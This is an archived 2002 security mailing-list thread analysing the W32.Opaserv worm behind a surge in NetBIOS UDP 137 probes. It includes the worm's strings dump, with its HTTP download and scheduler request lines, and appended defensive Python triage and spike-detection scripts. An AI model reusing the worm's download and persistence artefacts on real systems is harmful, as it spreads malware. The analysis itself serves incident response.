We had some internal machines that were contributing to the netbios flood attack. These machines were sniffed and from that we found a file on the identified machines named scrsvr.exe. The file was reverse engineered and the results are listed below. While some are attributing the netbios activity to Bugbear@mm it does not follow what we were seeing. It is known as W32.Opaserv.Worm. Comments?

ScrSvr31415
KERNEL32.dll
RegisterServiceProcess
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Internet Settings
ScrSvr
ScrSvrOld
ProxyEnable
ProxyServer
\ScrSvr.exe
ScrSin.dat
ScrSout.dat
scrupd.exe
www.opasoft.com
GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1
Host: www.opasoft.com
GET http://www.opasoft.com/work/lastver HTTP/1.1
Host: www.opasoft.com
GET http://www.opasoft.com/work/scrsvr.exe HTTP/1.1
Host: www.opasoft.com
POST http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0 HTTP/1.1
Host: www.opasoft.com
OK
PLAIN
CIPHER1
KEY
WINDOWS\scrsvr.exe
WINDOWS\win.ini
c:\tmp.ini
c:\windows\scrsvr.exe
,
windows
run
CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
LOCALHOST
KERNEL32.dll
ADVAPI32.dll
USER32.dll
WS2_32.dll
LocalAlloc
GetCurrentProcess
ExitThread
SetFilePointer
ResetEvent
ReadFile
CreateMutexA
LocalFree
GetModuleFileNameA
SetPriorityClass
SetEndOfFile
GetModuleHandleA
RegisterServiceProcess
GetPrivateProfileStringA
GetProcAddress
ExitProcess
CopyFileA
LocalReAlloc
CreateProcessA
CloseHandle
WaitForSingleObject
Sleep
CreateThread
CreateFileA
GetLastError
SetCurrentDirectoryA
DeleteFileA
GetFileSize
WriteFile
WritePrivateProfileStringA
lstrcat
lstrcmpi
lstrlen
GetWindowsDirectoryA
RegSetValueExA
RegQueryValueExA
RegOpenKeyExA
RegDeleteValueA
RegCloseKey
PeekMessageA
DispatchMessageA
TranslateMessage
socket
send
recvfrom
recv
inet_addr
gethostname
gethostbyname
connect
closesocket
bind
WSAStartup
sendto
WSAGetLastError
WSAEventSelect
WSAEnumNetworkEvents
WSACreateEvent
WSACloseEvent
Richard Grant [CNA, GSEC]
Security Engineer
Governor's Office for Technology
Commonwealth of Kentucky
Phone: 502-564-5792
Fax: 502.564.6856
richard.grantat_private
Web: http://www.state.ky.us/got/ois/security/security.html

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message.

-----Original Message-----
From: Emeric Miszti [mailto:emericat_private]
Sent: Monday, September 30, 2002 11:55 AM
To: incidentsat_private
Subject: Re: Unusual volume: UDP:137 probes

On Monday 30 Sep 2002 9:33 am, Mark Forsyth wrote:
> On Monday, September 30, 2002 9:02 AM, John Sage
> [SMTP:jsageat_private] wrote:
> > This has received some mention on the UNISOG list and elsewhere, but
> > not here.
> >
> > Some people have been seeing unusually high volumes of UDP:137 probes
> > since about 09/27/02 late, or early 09/28/02.
>
> A few people (who log such things) on the Optus cable network in Australia
> have been seeing it too.
> In my case since Sep 20 it's gone ...
> Sep 20 2 hits
> Sep 21, 22, 23 0 hits
> Sep 24 3 hits
> Sep 25 0 hits
> Sep 26 4 hits
> Sep 27 2 hits
> Sep 28 156 hits Starting at 02:20 (Aust. EST)
> Sep 29 410 hits
> Sep 30 406 hits up until 18:24
>

Been seeing exactly the same spike with same patterns. Up from 40 odd scans on 28/9/2002 to 495 already today. Incidents.org have picked this up at the Internet Storm Center: http://isc.incidents.org/port_details.html?port=137 No explanations or reasons have been given by anyone yet.
--
Emeric Miszti
UK Security Online
http://www.uksecurityonline.com
Tel No: 0870 088 5689
Fax No: 0870 706 2162
PGP Public Key available at http://www.uksecurityonline.com/emeric.asc

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
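Added example (not from the post, and not the worm's own code): a small Python triage script that reads a `strings`-style dump like the one Richard pasted, buckets the entries into registry keys, files, URLs, Winsock imports and NetBIOS-encoded names, and turns them into the findings a responder wants first (autostart location, update channel, scanning method). The sample input is constructed from the strings quoted in the message; the bucket names, regular expressions and verdict labels are my own. One detail worth knowing: the 32-character string `CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` is a NetBIOS name in first-level encoding, and decoding it gives `*` padded with NUL bytes, the wildcard name used in node-status queries on UDP 137, which is what links this binary to the probe volume the thread is discussing.

```python
import re
from collections import defaultdict

# Constructed sample: the readable strings from the scrsvr.exe dump in the post,
# one entry per line as `strings` prints them (relocation-table noise omitted).
SAMPLE_STRINGS = [
    "ScrSvr31415", "KERNEL32.dll", "RegisterServiceProcess",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\Internet Settings",
    "ScrSvr", "ScrSvrOld", "ProxyEnable", "ProxyServer",
    r"\ScrSvr.exe", "ScrSin.dat", "ScrSout.dat", "scrupd.exe", "www.opasoft.com",
    "GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1",
    "GET http://www.opasoft.com/work/lastver HTTP/1.1",
    "GET http://www.opasoft.com/work/scrsvr.exe HTTP/1.1",
    r"WINDOWS\scrsvr.exe", r"WINDOWS\win.ini", r"c:\tmp.ini", r"c:\windows\scrsvr.exe",
    "windows", "run", "CK" + "A" * 30, "LOCALHOST",
    "WS2_32.dll", "socket", "sendto", "recvfrom", "gethostbyname", "connect", "bind",
    "RegSetValueExA", "WritePrivateProfileStringA", "CreateMutexA", "CopyFileA",
]

URL_RE = re.compile(r"https?://[^\s\"']+")
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run$", re.IGNORECASE)
FILE_RE = re.compile(r"^[\w\\:.-]*\.(exe|dat|ini)$", re.IGNORECASE)
HOST_RE = re.compile(r"^[\w-]+(\.[\w-]+)+\.[a-z]{2,}$", re.IGNORECASE)
NETBIOS_RE = re.compile(r"^[A-P]{32}$")
WINSOCK_APIS = {"socket", "send", "sendto", "recv", "recvfrom", "connect", "bind",
                "gethostbyname", "WSAStartup"}


def decode_netbios_name(encoded):
    """Undo NetBIOS first-level encoding (RFC 1001 section 14.1): each of the 16 name
    bytes is sent as two characters, 'A' + high nibble and 'A' + low nibble."""
    if not NETBIOS_RE.match(encoded):
        raise ValueError("not a 32-character first-level encoded NetBIOS name")
    nibbles = [ord(c) - ord("A") for c in encoded]
    return "".join(chr((nibbles[i] << 4) | nibbles[i + 1]) for i in range(0, 32, 2))


def classify(strings):
    """Bucket raw strings into the artefact classes a triage analyst looks for first."""
    found = defaultdict(set)
    for s in (x.strip() for x in strings):
        if not s:
            continue
        m = URL_RE.search(s)
        if m:
            url = m.group(0)
            found["urls"].add(url)
            found["hosts"].add(url.split("/")[2].lower())
        elif s.lower().startswith("software\\"):
            found["registry_keys"].add(s)
            if RUN_KEY_RE.search(s):
                found["run_keys"].add(s)       # autostart location
        elif s.lower().endswith(".dll"):
            found["modules"].add(s)
        elif FILE_RE.match(s):
            found["files"].add(s)
        elif s in WINSOCK_APIS:
            found["winsock_apis"].add(s)
        elif NETBIOS_RE.match(s):
            found["netbios_names"].add(decode_netbios_name(s))
        elif HOST_RE.match(s):
            found["hosts"].add(s.lower())
    return found


def assess(strings):
    """Combine the buckets into yes/no findings; each rule names the strings it needs."""
    found = classify(strings)
    names = set(strings)
    verdicts = {
        # Run key string plus the API that writes registry values
        "run_key_persistence": bool(found["run_keys"]) and "RegSetValueExA" in names,
        # win.ini plus the profile-writing API plus the [windows] run= section/key names
        "win_ini_run_persistence": any(f.lower().endswith("win.ini") for f in found["files"])
            and "WritePrivateProfileStringA" in names and {"windows", "run"} <= names,
        "http_update_channel": bool(found["urls"]),
        # wildcard name '*' with datagram send/recv: node-status queries on UDP 137
        "netbios_wildcard_query": any(n.startswith("*") for n in found["netbios_names"])
            and {"sendto", "recvfrom"} <= found["winsock_apis"],
        "single_instance_mutex": "CreateMutexA" in names,
    }
    return found, verdicts


if __name__ == "__main__":
    found, verdicts = assess(SAMPLE_STRINGS)
    for bucket, items in sorted(found.items()):
        print(f"{bucket}: {sorted(repr(i) for i in items)}")
    for finding, hit in verdicts.items():
        print(f"{finding}: {'yes' if hit else 'no'}")
```

The verdict rules deliberately require an API import alongside the data string (a Run key path alone proves nothing; RegSetValueExA next to it does), which is the same pairing a responder checks by hand before calling a binary's behaviour from strings alone.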
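A second added example, again not from the post: the day-over-day spike detection that Mark's hit counts call for, run over constructed iptables-style firewall log lines. The daily totals are sized to match the counts he reported so the detector reproduces the Sep 28 break; the timestamps, the log format and the (documentation-range) source addresses are made up, and the threshold parameters are my own choices.

```python
import re
from collections import defaultdict
from statistics import median

# iptables-style syslog line; only month, day, SRC, PROTO and DPT are used.
LOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) \d\d:\d\d:\d\d .*?"
    r"SRC=(?P<src>[\d.]+) .*?PROTO=UDP .*?DPT=(?P<dpt>\d+)"
)

# Daily hit counts Mark Forsyth reported in the thread; they only size the constructed sample.
REPORTED = [("Sep 20", 2), ("Sep 21", 0), ("Sep 22", 0), ("Sep 23", 0), ("Sep 24", 3),
            ("Sep 25", 0), ("Sep 26", 4), ("Sep 27", 2), ("Sep 28", 156),
            ("Sep 29", 410), ("Sep 30", 406)]


def build_sample_log():
    """Constructed log: N UDP/137 drops per day from many documentation-range sources,
    plus one unrelated UDP/53 line per day that the port filter must ignore."""
    lines = []
    for day, n in REPORTED:
        for i in range(n):
            stamp = f"{(i * 7) % 24:02d}:{(i * 13) % 60:02d}:{(i * 17) % 60:02d}"
            net = "198.51.100" if i % 2 else "192.0.2"
            lines.append(f"{day} {stamp} fw kernel: DROP IN=eth0 SRC={net}.{1 + i % 254} "
                         f"DST=203.0.113.5 PROTO=UDP SPT=137 DPT=137 LEN=78")
        lines.append(f"{day} 12:00:00 fw kernel: DROP IN=eth0 SRC=192.0.2.9 "
                     f"DST=203.0.113.5 PROTO=UDP SPT=40000 DPT=53 LEN=60")
    return lines


def daily_summary(lines, port=137):
    """Return {day: (hits, distinct_sources)} for UDP datagrams to `port`."""
    hits = defaultdict(int)
    sources = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or int(m.group("dpt")) != port:
            continue
        day = f"{m.group('mon')} {int(m.group('day')):02d}"
        hits[day] += 1
        sources[day].add(m.group("src"))
    return {d: (hits[d], len(sources[d])) for d in hits}


def find_spikes(summary, days, window=7, factor=10, floor=50):
    """Flag a day whose hits exceed `factor` times the median of the previous `window`
    days and also reach `floor`, so a quiet baseline of 0-4 hits does not alert on
    a single stray probe. Days absent from `summary` count as zero hits."""
    spikes = []
    for i, day in enumerate(days):
        prev = [summary.get(d, (0, 0))[0] for d in days[max(0, i - window):i]]
        if not prev:
            continue
        baseline = median(prev)
        hits, nsrc = summary.get(day, (0, 0))
        if hits >= floor and hits > factor * max(baseline, 1):
            spikes.append({"day": day, "hits": hits, "baseline": baseline, "sources": nsrc})
    return spikes


if __name__ == "__main__":
    summary = daily_summary(build_sample_log())
    for s in find_spikes(summary, [d for d, _ in REPORTED]):
        print(f"{s['day']}: {s['hits']} hits from {s['sources']} sources "
              f"(baseline median {s['baseline']})")
```

The distinct-source count is reported next to the volume on purpose: hundreds of hits from hundreds of addresses is what a worm scanning from many infected hosts looks like, whereas the same volume from one address is a single scanner and a different response.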
This archive was generated by hypermail 2b30 : Tue Oct 01 2002 - 12:14:14 PDT